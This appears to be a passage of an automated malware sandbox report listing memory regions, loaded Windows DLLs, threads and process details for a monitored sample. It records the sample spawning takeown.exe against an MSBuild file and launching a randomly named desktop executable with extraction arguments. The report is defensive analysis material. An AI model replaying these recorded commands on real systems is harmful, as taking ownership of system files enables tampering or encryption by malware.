entry_point = 0x7ffaf57a0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 7751 start_va = 0x2bbf630000 end_va = 0x2bbf636fff entry_point = 0x0 region_type = private name = "private_0x0000002bbf630000" filename = "" Region: id = 7752 start_va = 0x7ffaf4260000 end_va = 0x7ffaf4287fff entry_point = 0x7ffaf4260000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 7753 start_va = 0x2bbf9c0000 end_va = 0x2bbfa6ffff entry_point = 0x0 region_type = private name = "private_0x0000002bbf9c0000" filename = "" Region: id = 7754 start_va = 0x2bbf7d0000 end_va = 0x2bbf7d6fff entry_point = 0x0 region_type = private name = "private_0x0000002bbf7d0000" filename = "" Region: id = 7755 start_va = 0x2bbfa70000 end_va = 0x2bbfbb0fff entry_point = 0x2bbfa70000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 7756 start_va = 0x2bbfa70000 end_va = 0x2bbfc2ffff entry_point = 0x0 region_type = private name = "private_0x0000002bbfa70000" filename = "" Region: id = 7757 start_va = 0x2bbfa70000 end_va = 0x2bbfb45fff entry_point = 0x2bbfa70000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 7758 start_va = 0x2bbfc20000 end_va = 0x2bbfc2ffff entry_point = 0x0 region_type = private name = "private_0x0000002bbfc20000" filename = "" Region: id = 7759 start_va = 0x7ffaf44d0000 end_va = 0x7ffaf44defff entry_point = 0x7ffaf44d0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 7760 start_va = 0x7ffaf4290000 end_va = 0x7ffaf42fafff entry_point = 0x7ffaf4290000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 7761 start_va = 0x7ffaf5140000 end_va = 0x7ffaf528dfff entry_point = 0x7ffaf5140000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 7762 start_va = 0x7ffaf5800000 end_va = 0x7ffaf5984fff entry_point = 0x7ffaf5800000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 7763 start_va = 0x2bbfa70000 end_va = 0x2bbfbf7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002bbfa70000" filename = "" Region: id = 7764 start_va = 0x2bbfc30000 end_va = 0x2bbfdb0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002bbfc30000" filename = "" Region: id = 7765 start_va = 0x2bbfdc0000 end_va = 0x2bbfe7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002bbfdc0000" filename = "" Region: id = 7766 start_va = 0x2bbf7e0000 end_va = 0x2bbf7e0fff entry_point = 0x2bbf7e0000 region_type = mapped_file name = "taskeng.exe.mui" filename = "\\Windows\\System32\\en-US\\TaskEng.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskeng.exe.mui") Region: id = 7767 start_va = 0x2bbf7f0000 end_va = 0x2bbf7f0fff entry_point = 0x0 region_type = private name = "private_0x0000002bbf7f0000" filename = "" Region: id = 7768 start_va = 0x2bbf800000 end_va = 0x2bbf800fff entry_point = 0x0 region_type = private name = "private_0x0000002bbf800000" filename = "" Region: id = 8967 start_va = 0x2bbf9c0000 end_va = 0x2bbfa3ffff entry_point = 0x0 region_type = private name = "private_0x0000002bbf9c0000" filename = "" Region: id = 8968 start_va = 0x2bbfa60000 end_va = 0x2bbfa6ffff entry_point = 0x0 region_type = private name = "private_0x0000002bbfa60000" filename = "" Region: id = 8969 start_va = 0x7ff7219aa000 end_va = 0x7ff7219abfff entry_point = 0x0 region_type = private name = "private_0x00007ff7219aa000" filename = "" Region: id = 8970 start_va = 0x7ffaf41b0000 end_va = 0x7ffaf41dbfff entry_point = 0x7ffaf41b0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 8971 start_va = 0x2bbfe80000 end_va = 0x2bbff7ffff entry_point = 0x0 region_type = private name = "private_0x0000002bbfe80000" filename = "" Region: id = 8972 start_va = 0x7ffaf3d00000 end_va = 0x7ffaf3d16fff entry_point = 0x7ffaf3d00000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 8973 start_va = 0x7ffaf3960000 end_va = 0x7ffaf3992fff entry_point = 0x7ffaf3960000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 8974 start_va = 0x2bbff80000 end_va = 0x2bc02b6fff entry_point = 0x2bbff80000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 8975 start_va = 0x7ffaf41e0000 end_va = 0x7ffaf41eafff entry_point = 0x7ffaf41e0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 9514 start_va = 0x2bc02c0000 end_va = 0x2bc033ffff entry_point = 0x0 region_type = private name = "private_0x0000002bc02c0000" filename = "" Region: id = 9515 start_va = 0x7ff7219a6000 end_va = 0x7ff7219a7fff entry_point = 0x0 region_type = private name = "private_0x00007ff7219a6000" filename = "" Region: id = 9536 start_va = 0x2bbf810000 end_va = 0x2bbf810fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002bbf810000" filename = "" Region: id = 9537 start_va = 0x2bc0340000 end_va = 0x2bc03bffff entry_point = 0x0 region_type = private name = "private_0x0000002bc0340000" filename = "" Region: id = 9538 start_va = 0x2bc03c0000 end_va = 0x2bc043ffff entry_point = 0x0 region_type = private name = "private_0x0000002bc03c0000" filename = "" Region: id = 9539 start_va = 0x7ff72187e000 end_va = 0x7ff72187ffff entry_point = 0x0 region_type = private name = "private_0x00007ff72187e000" filename = "" Region: id = 9540 start_va = 0x7ff7219a4000 end_va = 0x7ff7219a5fff entry_point = 0x0 region_type = private name = "private_0x00007ff7219a4000" filename = "" Region: id = 9541 start_va = 0x7ffaf6ec0000 end_va = 0x7ffaf6f64fff entry_point = 0x7ffaf6ec0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 9542 start_va = 0x7ffaf0230000 end_va = 0x7ffaf0238fff entry_point = 0x7ffaf0230000 region_type = mapped_file name = "tschannel.dll" filename = "\\Windows\\System32\\TSChannel.dll" (normalized: "c:\\windows\\system32\\tschannel.dll") Region: id = 10502 start_va = 0x2bc0440000 end_va = 0x2bc04bffff entry_point = 0x0 region_type = private name = "private_0x0000002bc0440000" filename = "" Region: id = 10503 start_va = 0x7ff72187c000 end_va = 0x7ff72187dfff entry_point = 0x0 region_type = private name = "private_0x00007ff72187c000" filename = "" Thread: id = 894 os_tid = 0x744 Thread: id = 922 os_tid = 0xfb0 Thread: id = 976 os_tid = 0x878 Thread: id = 977 os_tid = 0x5f4 Thread: id = 1014 os_tid = 0x8dc Thread: id = 1015 os_tid = 0x810 Process: id = "97" image_name = "takeown.exe" filename = "c:\\windows\\syswow64\\takeown.exe" page_root = "0x11934000" os_pid = "0x118" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "81" os_parent_pid = "0xec4" cmd_line = "takeown /F \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7061 start_va = 0x170000 end_va = 0x17ffff entry_point = 0x170000 region_type = mapped_file name = "takeown.exe" filename = "\\Windows\\SysWOW64\\takeown.exe" (normalized: "c:\\windows\\syswow64\\takeown.exe") Region: id = 7062 start_va = 0xb90000 end_va = 0x4b8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b90000" filename = "" Region: id = 7063 start_va = 0x4b90000 end_va = 0x4baffff entry_point = 0x0 region_type = private name = "private_0x0000000004b90000" filename = "" Region: id = 7064 start_va = 0x4bb0000 end_va = 0x4bb1fff entry_point = 0x0 region_type = private name = "private_0x0000000004bb0000" filename = "" Region: id = 7065 start_va = 0x4bc0000 end_va = 0x4bd3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004bc0000" filename = "" Region: id = 7066 start_va = 0x4be0000 end_va = 0x4c1ffff entry_point = 0x0 region_type = private name = "private_0x0000000004be0000" filename = "" Region: id = 7067 start_va = 0x4c20000 end_va = 0x4c5ffff entry_point = 0x0 region_type = private name = "private_0x0000000004c20000" filename = "" Region: id = 7068 start_va = 0x4c60000 end_va = 0x4c63fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004c60000" filename = "" Region: id = 7069 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 7070 start_va = 0x7f610000 end_va = 0x7f632fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f610000" filename = "" Region: id = 7071 start_va = 0x7f636000 end_va = 0x7f636fff entry_point = 0x0 region_type = private name = "private_0x000000007f636000" filename = "" Region: id = 7072 start_va = 0x7f63c000 end_va = 0x7f63efff entry_point = 0x0 region_type = private name = "private_0x000000007f63c000" filename = "" Region: id = 7073 start_va = 0x7f63f000 end_va = 0x7f63ffff entry_point = 0x0 region_type = private name = "private_0x000000007f63f000" filename = "" Region: id = 7074 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7075 start_va = 0x7fff0000 end_va = 0x7dfaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 7076 start_va = 0x7dfaf7a10000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfaf7a10000" filename = "" Region: id = 7077 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7078 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 7079 start_va = 0x4c70000 end_va = 0x4c70fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004c70000" filename = "" Region: id = 7080 start_va = 0x4c80000 end_va = 0x4c81fff entry_point = 0x0 region_type = private name = "private_0x0000000004c80000" filename = "" Region: id = 7129 start_va = 0x4de0000 end_va = 0x4deffff entry_point = 0x0 region_type = private name = "private_0x0000000004de0000" filename = "" Region: id = 7130 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 7131 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 7132 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7133 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 7134 start_va = 0x4c90000 end_va = 0x4d8ffff entry_point = 0x0 region_type = private name = "private_0x0000000004c90000" filename = "" Region: id = 7135 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7136 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 7137 start_va = 0x4b90000 end_va = 0x4b9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b90000" filename = "" Region: id = 7138 start_va = 0x7f510000 end_va = 0x7f60ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f510000" filename = "" Region: id = 7285 start_va = 0x4df0000 end_va = 0x4eadfff entry_point = 0x4df0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7286 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7287 start_va = 0x4d90000 end_va = 0x4dcffff entry_point = 0x0 region_type = private name = "private_0x0000000004d90000" filename = "" Region: id = 7288 start_va = 0x4eb0000 end_va = 0x4eeffff entry_point = 0x0 region_type = private name = "private_0x0000000004eb0000" filename = "" Region: id = 7289 start_va = 0x74ad0000 end_va = 0x74c0ffff entry_point = 0x74ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 7290 start_va = 0x7f639000 end_va = 0x7f63bfff entry_point = 0x0 region_type = private name = "private_0x000000007f639000" filename = "" Region: id = 7291 start_va = 0x77370000 end_va = 0x774bcfff entry_point = 0x77370000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 7292 start_va = 0x74aa0000 end_va = 0x74abdfff entry_point = 0x74aa0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 7293 start_va = 0x772c0000 end_va = 0x7736bfff entry_point = 0x772c0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 7294 start_va = 0x4ba0000 end_va = 0x4ba3fff entry_point = 0x0 region_type = private name = "private_0x0000000004ba0000" filename = "" Region: id = 7295 start_va = 0x74a90000 end_va = 0x74a99fff entry_point = 0x74a90000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 7296 start_va = 0x74a30000 end_va = 0x74a88fff entry_point = 0x74a30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 7297 start_va = 0x770b0000 end_va = 0x770f2fff entry_point = 0x770b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 7298 start_va = 0x74c10000 end_va = 0x74c53fff entry_point = 0x74c10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 7299 start_va = 0x74f70000 end_va = 0x75129fff entry_point = 0x74f70000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 7300 start_va = 0x745d0000 end_va = 0x745d7fff entry_point = 0x745d0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 7301 start_va = 0x4ef0000 end_va = 0x509ffff entry_point = 0x0 region_type = private name = "private_0x0000000004ef0000" filename = "" Region: id = 7302 start_va = 0x4ef0000 end_va = 0x5077fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004ef0000" filename = "" Region: id = 7303 start_va = 0x5090000 end_va = 0x509ffff entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 7304 start_va = 0x50a0000 end_va = 0x50c9fff entry_point = 0x50a0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 7305 start_va = 0x75220000 end_va = 0x7524afff entry_point = 0x75220000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 7306 start_va = 0x76da0000 end_va = 0x76ebffff entry_point = 0x76da0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 7307 start_va = 0x50a0000 end_va = 0x5220fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000050a0000" filename = "" Region: id = 7308 start_va = 0x5230000 end_va = 0x662ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005230000" filename = "" Region: id = 7309 start_va = 0x4bb0000 end_va = 0x4bb4fff entry_point = 0x4bb0000 region_type = mapped_file name = "takeown.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\takeown.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\takeown.exe.mui") Region: id = 7310 start_va = 0x4dd0000 end_va = 0x4dd0fff entry_point = 0x0 region_type = private name = "private_0x0000000004dd0000" filename = "" Region: id = 7311 start_va = 0x5080000 end_va = 0x5080fff entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 7330 start_va = 0x6630000 end_va = 0x6966fff entry_point = 0x6630000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 7331 start_va = 0x74c60000 end_va = 0x74cdafff entry_point = 0x74c60000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 7332 start_va = 0x74650000 end_va = 0x74677fff entry_point = 0x74650000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Thread: id = 863 os_tid = 0x8e0 Thread: id = 876 os_tid = 0x934 Process: id = "98" image_name = "vidhs3md.exe" filename = "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe" page_root = "0x11014000" os_pid = "0xbd4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "25" os_parent_pid = "0xa40" cmd_line = "vIDhS3md.exe -accepteula -c Run -y -p extract -nobanner" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7092 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 7093 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 7094 start_va = 0x40000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 7095 start_va = 0x60000 end_va = 0x9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 7096 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 7097 start_va = 0x1a0000 end_va = 0x1a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 7098 start_va = 0x400000 end_va = 0x476fff entry_point = 0x400000 region_type = mapped_file name = "vidhs3md.exe" filename = "\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe") Region: id = 7099 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 7100 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 7101 start_va = 0x7ffdb000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 7102 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 7103 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 7104 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7105 start_va = 0x7fff0000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 7106 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7107 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 7108 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 7109 start_va = 0x1c0000 end_va = 0x1c1fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 7139 start_va = 0x2c0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 7140 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 7141 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 7142 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7143 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 7144 start_va = 0x2d0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 7145 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7146 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 7147 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 7148 start_va = 0x7feb0000 end_va = 0x7ffaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 7233 start_va = 0x1d0000 end_va = 0x28dfff entry_point = 0x1d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7234 start_va = 0x20000 end_va = 0x23fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 7235 start_va = 0x74c60000 end_va = 0x74cdafff entry_point = 0x74c60000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 7236 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7237 start_va = 0x480000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 7238 start_va = 0x4c0000 end_va = 0x5bffff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 7239 start_va = 0x770b0000 end_va = 0x770f2fff entry_point = 0x770b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 7240 start_va = 0x7ffd8000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 7241 start_va = 0x772c0000 end_va = 0x7736bfff entry_point = 0x772c0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 7242 start_va = 0x74aa0000 end_va = 0x74abdfff entry_point = 0x74aa0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 7243 start_va = 0x74a90000 end_va = 0x74a99fff entry_point = 0x74a90000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 7244 start_va = 0x74a30000 end_va = 0x74a88fff entry_point = 0x74a30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 7245 start_va = 0x74eb0000 end_va = 0x74f6dfff entry_point = 0x74eb0000 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\SysWOW64\\comdlg32.dll" (normalized: "c:\\windows\\syswow64\\comdlg32.dll") Region: id = 7246 start_va = 0x74f70000 end_va = 0x75129fff entry_point = 0x74f70000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 7247 start_va = 0x771d0000 end_va = 0x7725cfff entry_point = 0x771d0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 7248 start_va = 0x74ad0000 end_va = 0x74c0ffff entry_point = 0x74ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 7249 start_va = 0x77370000 end_va = 0x774bcfff 